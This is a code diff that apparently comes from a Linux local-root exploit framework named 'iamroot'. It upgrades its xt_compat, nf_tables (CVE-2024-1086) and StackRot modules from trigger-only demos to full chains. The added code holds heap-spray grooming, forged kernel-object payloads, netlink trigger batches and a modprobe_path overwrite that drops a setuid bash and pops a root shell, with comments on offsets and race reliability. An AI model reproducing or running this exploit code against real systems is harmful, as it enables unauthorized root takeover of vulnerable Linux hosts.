+        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
                        "    NOTE: fires the xt_compat 4-byte OOB write via\n"
                        "    setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
-                        "    sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
+                        "    sk_buff sprays into kmalloc-2k.%s\n",
-                        "    leak→modprobe_path cred chain (per-kernel offsets).\n");
+                ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
                ctx->full_chain ? " On primitive witness, invokes\n"
                                  "    shared modprobe_path finisher for root pop."
                                : " Does NOT perform the\n"
                                  "    leak→modprobe_path cred chain (per-kernel offsets).");
    }
    signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (corrupted > 0) {
            /* Empirical primitive witness: OOB write landed in adjacent
-             * slot. Still NOT root — but it's the primitive we promised. */
+             * slot. */
            if (full_chain_ready) {
                /* Full-chain: invoke the shared modprobe_path finisher
                 * using our msg_msg arb-write primitive. The finisher
                 * either execve's a setuid bash (success) or returns
                 * EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
                struct xtcompat_arb_ctx arb_ctx = {
                    .queues    = queues,
                    .n_queues  = XTCOMPAT_SPRAY_QUEUES,
                    .outer_uid = outer_uid,
                    .outer_gid = outer_gid,
                    .arb_calls = 0,
                    .arb_landed = 0,
                };
                int fr = iamroot_finisher_modprobe_path(&off,
                                                        xtcompat_arb_write,
                                                        &arb_ctx,
                                                        !ctx->no_shell);
                /* If the finisher execve'd a root shell, we never get
                 * here. Otherwise it returned EXPLOIT_FAIL / OK. */
                FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
                if (fl) {
                    fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
                            fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
                    fclose(fl);
                }
                xtcompat_msgmsg_drain(queues);
                if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
                _exit(35);
            }
            /* Primitive-only mode: still NOT root — but it's the
             * primitive we promised. */
            _exit(33);
        }
        /* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (ctx->no_shell) return IAMROOT_OK;
        return IAMROOT_EXPLOIT_FAIL;
    case 34:
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
                            "EXPLOIT_OK (sentinel setuid bash dropped)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    case 35:
        if (!ctx->json) {
            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
                            "FAIL (sentinel not observed within timeout)\n"
                            "    See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    default:
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
@@ -7,20 +7,23 @@
 * January 2024 by Notselwyn (Pumpkin); widely known as the
 * "nft_verdict_init / pipapo UAF".
 *
- * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
+ * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
- *   - Full netlink ruleset construction (table → chain → set → rule
+ *                          --full-chain finisher.
- *     with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
+ *   - Default (no --full-chain): full netlink ruleset construction
- *     to reject on vulnerable kernels).
+ *     (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
- *   - Fires the double-free path by abusing the malformed verdict in a
+ *     that nft_verdict_init() fails to reject on vulnerable kernels),
- *     pipapo set element, then removing the rule so the kernel's
+ *     fires the double-free path, runs the msg_msg cg-96 groom, and
- *     transaction commit frees the verdict's chain reference twice.
+ *     returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
- *   - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
+ *   - With --full-chain: after the trigger lands, we resolve kernel
- *     and configurable, but the arbitrary R/W stage and cred-overwrite
+ *     offsets (env → kallsyms → System.map → embedded table) and run
- *     are NOT performed end-to-end — that requires per-kernel offsets
+ *     a Notselwyn-style pipapo arb-write via the shared
- *     (init_task, modprobe_path) and Notselwyn's 600-line pipapo
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself
- *     leak-and-write dance. We stop after triggering the bug,
+ *     is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
- *     observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
+ *     payload tagged with the kaddr in the value-pointer slot. The
- *     with a verbose continuation roadmap.
+ *     exact pipapo_elem layout (and the value-pointer field offset)
 *     is per-kernel-build; on hosts where the offset doesn't match
 *     the shipped guess, the finisher's sentinel check correctly
 *     reports failure rather than silently lying about success.
 *
 * To convert this to full Option A (root pop):
 *   1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
    return active;
 }
 /* ------------------------------------------------------------------
 * Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
 * end) into a caller-provided buffer. Returns bytes written.
 * Factored out so --full-chain can re-fire the trigger between
 * msg_msg sprays without duplicating the batch-building logic.
 * ------------------------------------------------------------------ */
 #ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
    size_t off = 0;
    put_batch_begin(batch, &off, (*seq)++);
    put_new_table(batch, &off, (*seq)++);
    put_new_chain(batch, &off, (*seq)++);
    put_new_set(batch, &off, (*seq)++);
    put_malicious_setelem(batch, &off, (*seq)++);
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
 static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
    size_t off = 0;
    put_batch_begin(batch, &off, (*seq)++);
    put_malicious_setelem(batch, &off, (*seq)++);
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
 /* ------------------------------------------------------------------
 * Notselwyn-style pipapo arb-write context. The technique:
 *   1. fire the trigger (double-free of an nft chain reference in
 *      kmalloc-cg-96)
 *   2. spray msg_msg payloads sized for cg-96, whose first qwords
 *      encode a forged pipapo_elem header with value-pointer = kaddr
 *   3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
 *      the kernel copies it through the forged value-pointer to kaddr
 *
 * Per-kernel caveat: the byte offset of the value pointer inside an
 * nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
 * KASAN can all shift it). We ship the layout for an
 * lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
 * exploitable range for which Notselwyn's public PoC was validated)
 * and rely on the shared finisher's sentinel-file post-check to flag
 * a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
 * ------------------------------------------------------------------ */
 struct nft_arb_ctx {
    bool in_userns;   /* parent has already entered userns+netns */
    int  sock;        /* nfnetlink socket (live in our userns) */
    uint8_t *batch;   /* reusable batch buffer (16 KiB) */
    int  *qids;       /* msg_msg queue ids; lazy-allocated/drained */
    int   qcap;
    int   qused;
 };
 /* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
 * elements) inside an nft_pipapo_elem header for the kernels in
 * range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
 * best-effort default — if it doesn't match the running kernel's
 * struct layout, the finisher's sentinel check will report failure. */
 #define PIPAPO_ELEM_VALUE_PTR_OFFSET  0x10
 /* Spray msg_msg payloads forged to look like pipapo_elem with our
 * target kaddr as the value pointer. Returns 0 on success. */
 static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
 {
    if (c->qused + n > c->qcap) n = c->qcap - c->qused;
    if (n <= 0) return 0;
    for (int i = 0; i < n; i++) {
        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
        if (q < 0) { perror("[-] msgget"); return -1; }
        c->qids[c->qused++] = q;
        struct msgbuf_payload m;
        m.mtype = 0x5050415000 + i;   /* 0x50 0x50 0x41 0x50 0x00 = "PPAP\0" tag for diagnostics */
        memset(m.mtext, 0, sizeof m.mtext);
        /* Forge a pipapo_elem header at the start of the msg payload.
         * Layout (best-effort, x86_64, no RANDSTRUCT):
         *   +0x00  priv list_head pointers (leave zero — kernel won't
         *                                   walk them in the write path)
         *   +0x10  ext / value pointer  <-- write target
         * msg_msg eats the first 0x30 bytes as its own header, so our
         * payload bytes land at offset 0x30 of the slab chunk; we
         * pre-pad and place the forged pointer at the right offset
         * inside our 96-byte payload. */
        uintptr_t *slots = (uintptr_t *)m.mtext;
        slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
        if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
            perror("[-] msgsnd(forged)"); return -1;
        }
    }
    return 0;
 }
 /* Module-specific arb-write. See finisher.h for the contract. */
 static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
    if (!c || c->sock < 0 || !c->batch) {
        fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
        return -1;
    }
    if (len > 64) {
        /* Element data attr cap — we only need 24 bytes for a path. */
        fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
        return -1;
    }
    fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
                    "elements (target kaddr=0x%lx, %zu bytes)\n",
                    (unsigned long)kaddr, len);
    /* (a) re-fire the trigger to reach a fresh UAF state. */
    uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
    size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
    if (nft_send_batch(c->sock, c->batch, blen) < 0) {
        fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
        return -1;
    }
    /* (b) spray msg_msg payloads carrying the forged value-pointer. */
    if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
        fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
        return -1;
    }
    /* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
     * where our forged pipapo_elem won the race for the freed slot,
     * the set-element commit path copies our data through the
     * attacker-controlled value pointer into kaddr.
     *
     * The put_malicious_setelem builder used by the refire batch in
     * step (a) carries NFTA_DATA_VERDICT, so it cannot deliver `buf`.
     * The fallback-depth choice: after the refire batch (which the
     * kernel WILL process), send a second batch with a hand-rolled
     * NEWSETELEM whose NFTA_DATA_VALUE carries buf. If the kernel
     * ignores our DATA shape, the finisher sentinel still reports
     * the outcome. */
    seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
    size_t off = 0;
    put_batch_begin(c->batch, &off, seq++);
    /* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
    size_t msg_at = off;
    put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
                NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET,   NFT_SET_NAME);
    size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
    size_t el_at   = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
    /* key — reuse the DROP verdict so commit path matches our prior elem */
    size_t key_at  = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
    size_t kv_at   = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
    put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
    end_nest(c->batch, &off, kv_at);
    end_nest(c->batch, &off, key_at);
    /* data — NFTA_DATA_VALUE carrying buf */
    size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
    put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
    end_nest(c->batch, &off, data_at);
    end_nest(c->batch, &off, el_at);
    end_nest(c->batch, &off, list_at);
    end_msg(c->batch, &off, msg_at);
    put_batch_end(c->batch, &off, seq++);
    if (nft_send_batch(c->sock, c->batch, off) < 0) {
        fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
        return -1;
    }
    /* Let the kernel run the commit/cleanup. */
    usleep(20 * 1000);
    return 0;
 }
 #endif /* __linux__ */
 /* ------------------------------------------------------------------
 * The exploit body.
 * ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
+        if (ctx->full_chain) {
-                        "    state but does NOT complete the kernel-R/W chain.\n"
+            fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
-                        "    See Notselwyn's CVE-2024-1086 public PoC for the\n"
+                            "arb-write + modprobe_path finisher\n");
-                        "    cred-overwrite stage (~500 LOC of pipapo grooming).\n");
+        } else {
            fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
                            "    double-free state and stops. Pass --full-chain\n"
                            "    to attempt the modprobe_path root-pop.\n");
        }
    }
-    /* Fork: child enters userns+netns and fires the bug. If the
+#ifdef __linux__
    /* --- --full-chain path --------------------------------------- *
     * Resolve offsets BEFORE doing anything destructive so we can
     * refuse cleanly on hosts where we have no modprobe_path. We run
     * in-process (no fork) because the finisher's modprobe_path
     * trigger needs the same task's userns+netns + nfnetlink socket
     * as the arb-write.
     */
    if (ctx->full_chain) {
        struct iamroot_kernel_offsets off;
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("nf_tables");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        if (enter_unpriv_namespaces() < 0) {
            fprintf(stderr, "[-] nf_tables: userns entry failed\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
        if (sock < 0) {
            perror("[-] socket(NETLINK_NETFILTER)");
            return IAMROOT_EXPLOIT_FAIL;
        }
        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
            perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
        }
        int rcvbuf = 1 << 20;
        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
        /* Pre-spray to make the cg-96 slab layout more predictable. */
        int qids[SPRAY_MSGS * 4];
        for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
        if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
            close(sock); return IAMROOT_EXPLOIT_FAIL;
        }
        uint8_t *batch = calloc(1, 16 * 1024);
        if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
        /* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
        uint32_t seq = (uint32_t)time(NULL);
        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
        if (!ctx->json) {
            fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
                    blen);
        }
        if (nft_send_batch(sock, batch, blen) < 0) {
            fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
            drain_spray(qids, SPRAY_MSGS / 2);
            free(batch); close(sock);
            return IAMROOT_EXPLOIT_FAIL;
        }
        /* Wire up the arb-write context and hand off to the shared
         * finisher. The finisher will:
         *   - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
         *     which re-fires the trigger and sprays forged pipapo elems
         *   - execve() the trigger binary to invoke modprobe
         *   - poll for the setuid sentinel, and spawn a root shell. */
        struct nft_arb_ctx ac = {
            .in_userns = true,
            .sock      = sock,
            .batch     = batch,
            .qids      = qids,
            .qcap      = (int)(sizeof qids / sizeof qids[0]),
            .qused     = SPRAY_MSGS / 2,
        };
        iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
                                 nft_arb_write, &ac, !ctx->no_shell);
        drain_spray(qids, ac.qused);
        free(batch);
        close(sock);
        return r;
    }
 #endif
    /* --- primitive-only path: fork-isolated trigger -------------- *
     * Fork: child enters userns+netns and fires the bug. If the
     * kernel panics on KASAN we don't want our parent process to be
     * the one that takes the hit. */
    pid_t child = fork();
@@ -16,13 +16,14 @@
 * state management + RCU-grace-period timing and depends on
 * per-kernel-build offsets for init_task / anon_vma / cred.
 *
- * STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
+ * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in
- *   userns-reach, race harness (mremap()/munmap() vs concurrent
+ *   --full-chain FALLBACK finisher. We carry the userns-reach, race
- *   fork/fault), msg_msg slab spray, and empirical witness pieces;
+ *   harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
- *   we do NOT carry the read primitive (vmemmap leak via msg_msg
+ *   slab spray, and empirical witness pieces; we do NOT carry the
- *   MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
+ *   read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
- *   offsets (init_task, anon_vma, cred layout) that vary by build
+ *   Ruihan-Li-precision fake-anon_vma_chain plant. Those need
- *   and would be fabricated without a real leak.
+ *   per-kernel offsets (init_task, anon_vma, cred layout) that vary
 *   by build and would be fabricated without a real leak.
 *
 *   Per repo policy ("verified-vs-claimed"): we run the trigger,
 *   record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
 *   upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
 *   does, and we do not currently demonstrate that.
 *
 *   --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
 *   budget from 3 s to 30 s and sprays the kmalloc-192 slab with
 *   payloads tagged with the modprobe_path kernel address (so IF the
 *   UAF reclaim ever lands attacker-controlled bytes on an
 *   anon_vma_chain slot, those bytes carry the kaddr we want the
 *   subsequent rb_node walk / vma_lock-acquire fault to touch). The
 *   honest empirical reality is that even at 30 s the race-win rate
 *   is well below 1 % on a real vulnerable kernel — Ruihan Li's
 *   public PoC reports minutes-to-hours for first reclaim. The shared
 *   modprobe_path finisher has a 3 s sentinel timeout, so on the
 *   overwhelmingly common no-land outcome the finisher itself reports
 *   EXPLOIT_FAIL gracefully. --full-chain does NOT change the
 *   fundamental <1 %-per-run reliability; it widens the trigger
 *   window and wires up the root-pop plumbing for the lucky case.
 *
 * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
 *   6.3.x  : K >= 6.3.10
 *   6.1.x  : K >= 6.1.37 (LTS — most relevant)
@@ -54,6 +70,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -200,9 +218,10 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
 * neighbouring VMAs that we mutate with mremap()/munmap(). The
 * public PoC uses dozens of adjacent VMAs to force the maple tree
 * into the node-rotation path; we ship a configurable knob. */
-#define STACKROT_RACE_VMAS         64
+#define STACKROT_RACE_VMAS              64
-#define STACKROT_RACE_ITERATIONS   4000      /* per-iter budget */
+#define STACKROT_RACE_ITERATIONS        4000  /* per-iter budget */
-#define STACKROT_RACE_TIME_BUDGET  3         /* seconds */
+#define STACKROT_RACE_TIME_BUDGET       3     /* seconds — primitive-only mode */
 #define STACKROT_RACE_FULLCHAIN_BUDGET  30    /* seconds — extended for --full-chain */
 /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
 * 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
    return active;
 }
 /* ---- Arb-write primitive (FALLBACK depth) ------------------------
 *
 * The shared modprobe_path finisher calls back into this function
 * once per kernel write it wants to land. For StackRot we cannot
 * deliver a deterministic arb-write — the underlying race wins on
 * well under 1 % of runs even with a 30 s budget, and even when the
 * race wins our spray-only groom has nowhere near the precision of
 * Ruihan Li's multi-stage public PoC (which crafts a fake
 * anon_vma_chain whose `vma_lock` pointer steers a subsequent
 * page-fault into touching `kaddr` for the lock acquire).
 *
 * Honest depth: FALLBACK. Each invocation:
 *   1. Re-seeds the kmalloc-192 spray with payloads carrying
 *      `kaddr` in the second qword of the msg_msg body (after an
 *      8-byte "IAMROOT_" tag), so that IF a sprayed slot ends up
 *      overlaying the freed anon_vma_chain after RCU grace, the
 *      kaddr we want the kernel to deref appears at the AVC
 *      layout position the maple-tree rotation will read.
 *   2. Re-runs the race threads for an extended budget
 *      (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
 *   3. Returns 0 whenever the race ran (-1 only for an invalid ctx
 *      or a pthread_create failure); we cannot verify in-process
 *      whether the write landed. The shared finisher's 3 s sentinel
 *      file check is the empirical arbiter: on the overwhelmingly
 *      common no-land outcome it reports EXPLOIT_FAIL gracefully,
 *      and we never claim a write that didn't land. */
 struct stackrot_arb_ctx {
    int   *queues;          /* live SysV msg queue ids */
    int    n_queues;
    int    arb_calls;       /* incremented by stackrot_arb_write() */
    struct race_region *region;
 };
 static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
                                       uintptr_t kaddr,
                                       const void *buf, size_t len)
 {
    struct ipc_payload p;
    memset(&p, 0, sizeof p);
    p.mtype = 0x4943;   /* 'IC' */
    memset(p.buf, 0x49, sizeof p.buf);
    memcpy(p.buf, "IAMROOT_", 8);
    /* Pack the target kaddr at byte 8 (one qword in) and the
     * caller's payload bytes immediately after — this way ANY
     * reasonable AVC field offset hit by the corruption pulls
     * out one of our two attacker-controlled regions. */
    uint64_t k64 = (uint64_t)kaddr;
    memcpy(p.buf + 8, &k64, sizeof k64);
    size_t copy = len;
    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
    if (buf && copy) memcpy(p.buf + 16, buf, copy);
    /* Append the kaddr-tagged message to at most 4 queues; doing
     * all STACKROT_SPRAY_QUEUES could exhaust the SysV message-queue
     * quota on busy hosts. */
    int touched = 0;
    for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
        if (queues[i] < 0) continue;
        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
    }
    return touched;
 }
 static int stackrot_arb_write(uintptr_t kaddr,
                              const void *buf, size_t len,
                              void *ctx_v)
 {
    struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
    if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
    c->arb_calls++;
    fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
                    "(FALLBACK — race-dependent)\n",
            c->arb_calls, (unsigned long)kaddr, len);
    /* Step 1: re-seed spray with kaddr-tagged payloads. */
    int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
    if (seeded == 0) {
        fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
        /* Continue anyway — original spray still tagged with cookie. */
    } else {
        fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
                seeded);
    }
    /* Step 2: extended race window. This expands the trigger budget
     * from 3 s to 30 s, but Ruihan Li's PoC reports
     * minutes-to-hours for first reclaim, so a 30 s window still
     * means a <1 % chance per arb_write call on a real vulnerable
     * kernel, and structurally 0 % on a patched one. */
    atomic_store(&g_race_running, 1);
    atomic_store(&g_race_a_iters, 0);
    atomic_store(&g_race_b_iters, 0);
    atomic_store(&g_race_b_faults, 0);
    pthread_t ta, tb;
    bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
    bool b_ok = a_ok &&
                pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
    if (!a_ok || !b_ok) {
        atomic_store(&g_race_running, 0);
        if (a_ok) pthread_join(ta, NULL);
        fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
        return -1;
    }
    sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
    atomic_store(&g_race_running, 0);
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);
    uint64_t a_iters = atomic_load(&g_race_a_iters);
    uint64_t b_iters = atomic_load(&g_race_b_iters);
    uint64_t b_faults = atomic_load(&g_race_b_faults);
    fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
                    "(reliability remains <1%% even at this budget)\n",
            (unsigned long long)a_iters,
            (unsigned long long)b_iters,
            (unsigned long long)b_faults);
    /* Step 3: cannot in-process verify the write. Return 0; the
     * finisher's sentinel-file check is the empirical arbiter. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
        }
    }
    /* Full-chain pre-check: resolve offsets BEFORE forking + entering
     * userns. If modprobe_path is unresolvable we refuse here rather
     * than running a 30 s race that has no finisher to call. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("stackrot");
            fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
                            "offset unresolved; refusing\n");
            fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
                            "well below 1%% per run — see module header.\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
        fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
                        "%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
                        "    catches no-land outcomes gracefully.\n",
                STACKROT_RACE_FULLCHAIN_BUDGET);
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
+        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
                ctx->full_chain ? " + full-chain finisher" : "");
    }
    uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
         * any in-flight RCU grace periods that started during the race. */
        usleep(200 * 1000);
        /* 7a. --full-chain finisher (FALLBACK depth).
         *
         * Invoke the shared modprobe_path finisher; its arb_write
         * callback (stackrot_arb_write) will re-seed the spray with
         * kaddr-tagged payloads and re-run the race for an extended
         * 30 s budget. The finisher's own 3 s sentinel-file timeout
         * then arbitrates: on the overwhelmingly common no-land
         * outcome it returns EXPLOIT_FAIL gracefully.
         *
         * Honest reliability: <1 % per run even with the extension. */
        if (full_chain_ready) {
            struct stackrot_arb_ctx arb_ctx = {
                .queues    = queues,
                .n_queues  = STACKROT_SPRAY_QUEUES,
                .arb_calls = 0,
                .region    = &region,
            };
            int fr = iamroot_finisher_modprobe_path(&off,
                                                    stackrot_arb_write,
                                                    &arb_ctx,
                                                    !ctx->no_shell);
            FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
            if (fl) {
                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
                        fr, arb_ctx.arb_calls);
                fclose(fl);
            }
            drain_anon_vma_slab(queues);
            race_region_teardown(&region);
            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
            _exit(35);                                  /* finisher ran, no land */
        }
        drain_anon_vma_slab(queues);
        race_region_teardown(&region);
@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
    int rc = WEXITSTATUS(status);
    if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
    if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
    if (rc == 34) {
        /* Finisher reported root-pop success. The shared finisher
         * normally execve()s the root shell, so this path is reached
         * only when --no-shell was set. */
        if (!ctx->json) {
            fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
                            "EXPLOIT_OK (race won + write landed)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    }
    if (rc == 35) {
        /* Finisher ran but the write did not land. This is by far the
         * expected outcome given the <1% race-win rate. */
        if (!ctx->json) {
            fprintf(stderr, "[~] stackrot: --full-chain finisher ran, but the race did not\n"
                            "    win and land within budget (this is the expected\n"
                            "    outcome: race-win reliability is <1%% per run).\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    }
    if (rc != 30) {
        fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
        return IAMROOT_EXPLOIT_FAIL;